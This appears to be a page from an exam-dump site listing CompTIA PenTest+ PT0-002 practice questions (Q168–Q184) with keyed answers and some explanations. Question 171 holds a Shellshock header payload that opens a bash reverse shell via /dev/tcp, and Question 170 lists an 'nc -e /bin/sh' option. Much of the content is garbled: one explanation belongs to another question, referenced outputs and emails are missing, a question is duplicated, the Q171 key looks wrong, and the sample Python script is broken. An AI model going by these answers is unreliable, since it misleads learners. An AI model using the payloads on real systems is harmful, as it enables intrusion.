January 2024 CompTIA PT0-002 Actual Questions and Real Exam Questions with 100% Coverage [Q168-Q184]

PT0-002 Free Exam Questions and Answers PDF, Latest Questions for January 2024

Question # 168
After running the enum4linux.pl command, a penetration tester received the following output:

Which of the following commands should the penetration tester run NEXT?

  • A. smbget //192.168.100.56/web -U ''
  • B. smbspool //192.160.100.56/print$
  • C. net rpc share -S 192.168.100.56 -U ''
  • D. smbclient //192.168.100.56/web -U '' -N

Correct answer: D

Explanation:
A vulnerability scan is a type of assessment that helps to identify vulnerabilities in a network or system. It scans systems for potential vulnerabilities, misconfigurations, and outdated software. Based on the output from a vulnerability scan, a penetration tester can identify vulnerabilities that may be exploited to gain access to a system. In this scenario, the output from the penetration testing tool shows that 100 hosts contained findings due to improper patch management. This indicates that the vulnerability scan detected vulnerabilities that could have been prevented through proper patch management. Therefore, the most likely test performed by the penetration tester is a vulnerability scan.


Question # 169
A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet. Which of the following OSs would MOST likely return a packet of this type?

  • A. Apple
  • B. Linux
  • C. Android
  • D. Windows

Correct answer: D

Explanation:
The ping -A command sends an ICMP echo request with a specified TTL value and displays the response. The TTL value indicates how many hops the packet can traverse before being discarded. Different OSs have different default TTL values for their packets. Windows uses 128, Apple uses 64, Linux uses 64 or 255, and Android uses 64. Therefore, a packet with a TTL of 128 is most likely from a Windows OS.


Question # 170
A penetration tester has obtained root access to a Linux-based file server and would like to maintain persistence after reboot. Which of the following techniques would BEST support this objective?

  • A. Move laterally to create a user account on LDAP
  • B. Create a one-shot system service to establish a reverse shell.
  • C. Run the nc -e /bin/sh <...> command.
  • D. Obtain /etc/shadow and brute force the root password.

Correct answer: B

Explanation:
https://hosakacorp.net/p/systemd-user.html


Question # 171
A penetration tester discovers a vulnerable web server at 10.10.1.1. The tester then edits a Python script that sends a web exploit and comes across the following code:

exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/127.0.0.1/9090 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

Which of the following edits should the tester make to the script to determine the user context in which the server is being run?

  • A. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& find / -perm -4000", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • B. exploits = {"User-Agent": "() { ignored;};/bin/bash -i id;whoami", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • C. exploits = {"User-Agent": "() { ignored;};/bin/sh -i ps -ef" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}
  • D. exploits = {"User-Agent": "() { ignored;};/bin/bash -i>& /dev/tcp/10.10.1.1/80" 0>&1", "Accept": "text/html,application/xhtml+xml,application/xml"}

Correct answer: D


Question # 172
Using the output, identify potential attack vectors that should be further investigated.




Correct answer:

Explanation:
1: Null session enumeration
   Weak SMB file permissions
   Fragmentation attack
2: nmap -sV -p 1-1023 192.168.2.2
3: #!/usr/bin/python
   export $PORTS = 21,22
   for $PORT in $PORTS:
       try:
           s.connect((ip, port))
           print("%s:%s - OPEN" % (ip, port))
       except socket.timeout:
           print("%s:%s - TIMEOUT" % (ip, port))
       except socket.error as e:
           print("%s:%s - CLOSED" % (ip, port))
       finally:
           s.close()
   port_scan(sys.argv[1], ports)


Question # 173
A penetration tester received a .pcap file to look for credentials to use in an engagement. Which of the following tools should the tester utilize to open and read the .pcap file?

  • A. Wireshark
  • B. Metasploit
  • C. Nmap
  • D. Netcat

Correct answer: A


Question # 174
A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good. Which of the following recommendations should the penetration tester include in the report?

  • A. Perform routine static and dynamic analysis of committed code.
  • B. Perform fuzz testing of compiled binaries.
  • C. Validate API security settings before deployment.
  • D. Add a dependency checker into the tool chain.

Correct answer: D

Explanation:
Adding a dependency checker into the tool chain is the best recommendation for the company that has been including vulnerable third-party modules in multiple products. A dependency checker is a tool that analyzes the dependencies of a software project and identifies any known vulnerabilities or outdated versions. This can help the developers to update or replace the vulnerable modules before deploying the products.


Question # 175
A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

  • A. Scarcity and fear
  • B. Authority and urgency
  • C. Social proof and greed
  • D. Familiarity and likeness

Correct answer: B


Question # 176
The following line-numbered Python code snippet is being used in reconnaissance:

Which of the following line numbers from the script MOST likely contributed to the script triggering a "probable port scan" alert in the organization's IDS?

  • A. Line 02
  • B. Line 07
  • C. Line 01
  • D. Line 08

Correct answer: D


Question # 177
A penetration tester is trying to restrict searches on Google to a specific domain. Which of the following commands should the penetration tester consider?

  • A. inurl:
  • B. intitle:
  • C. link:
  • D. site:

Correct answer: D


Question # 178
A penetration tester has prepared the following phishing email for an upcoming penetration test:

Which of the following is the penetration tester using MOST to influence phishing targets to click on the link?

  • A. Scarcity and fear
  • B. Authority and urgency
  • C. Social proof and greed
  • D. Familiarity and likeness

Correct answer: B


Question # 179
A penetration tester is scanning a corporate lab network for potentially vulnerable services. Which of the following Nmap commands will return vulnerable ports that might be interesting to a potential attacker?

  • A. nmap 192.168.1.1-5 -PU22-25,80
  • B. nmap 192.168.1.1-5 -Ss22-25,80
  • C. nmap 192.168.1.1-5 -PA22-25,80
  • D. nmap 192.168.1.1-5 -PS22-25,80

Correct answer: D

Explanation:
PS/PA/PU/PY are host discovery flags which use TCP SYN/ACK, UDP or SCTP discovery respectively. And since the ports in the options are mostly used by TCP protocols, then it's either the PS or PA flag. But since we need to know if the ports are live, sending SYN packet is a better alternative. Hence, I choose PS in this case.


Question # 180
Which of the following assessment methods is MOST likely to cause harm to an ICS environment?

  • A. Ping sweep
  • B. Packet analysis
  • C. Protocol reversing
  • D. Active scanning

Correct answer: D


Question # 181
A penetration tester ran an Nmap scan on an Internet-facing network device with the -F option and found a few open ports. To further enumerate, the tester ran another scan using the following command:
nmap -O -A -sS -p- 100.100.100.50
Nmap returned that all 65,535 ports were filtered. Which of the following MOST likely occurred on the second scan?

  • A. A firewall or IPS blocked the scan.
  • B. The penetration tester used unsupported flags.
  • C. The edge network device was disconnected.
  • D. The scan returned ICMP echo replies.

Correct answer: A


Question # 182
A penetration tester finds a PHP script used by a web application in an unprotected internal source code repository. After reviewing the code, the tester identifies the following:

Which of the following tools will help the tester prepare an attack for this scenario?

  • A. Hydra and crunch
  • B. Nmap and OWASP ZAP
  • C. Netcat and cURL
  • D. Burp Suite and DIRB

Correct answer: D


Question # 183
A penetration tester who is doing a security assessment discovers that a critical vulnerability is being actively exploited by cybercriminals. Which of the following should the tester do NEXT?

  • A. Call law enforcement officials immediately
  • B. Collect the proper evidence and add to the final report
  • C. Try to take down the attackers
  • D. Reach out to the primary point of contact

Correct answer: D

Explanation:
The penetration tester should reach out to the primary point of contact as soon as possible to inform them of the critical vulnerability and the active exploitation by cybercriminals. This is the most responsible and ethical course of action, as it allows the client to take immediate steps to mitigate the risk and protect their assets. The other options are not appropriate or effective in this situation. Trying to take down the attackers would be illegal and dangerous, as it may escalate the conflict or cause collateral damage. Calling law enforcement officials immediately would be premature and unnecessary, as it may involve disclosing confidential information or violating the scope of the engagement. Collecting the proper evidence and adding to the final report would be too slow and passive, as it would delay the notification and remediation of the vulnerability.


Question # 184
......


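The CompTIA PenTest+ exam is aimed at professionals with at least three years of experience in security-focused IT roles. The certification exam validates the skills needed for effective penetration testing and can improve employability in the IT security job market. The PT0-002 exam covers topics such as planning and scoping, reconnaissance, vulnerability identification, vulnerability exploitation, post-exploitation techniques, and reporting and communication. Certified professionals can demonstrate to employers that they have the knowledge and skills needed to protect systems and networks from cyber threats.


The CompTIA PT0-002 exam is the updated version of the CompTIA PenTest+ certification exam. This new version is designed to meet the latest standards of the cybersecurity industry and is more comprehensive than the previous version. The new exam covers a wider range of technologies, including cloud computing, IoT (Internet of Things) devices, and mobile devices. The objectives of the updated exam are also aligned with the National Institute of Standards and Technology (NIST) Cybersecurity Framework, a standard that many organizations use to protect their systems and networks.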

 
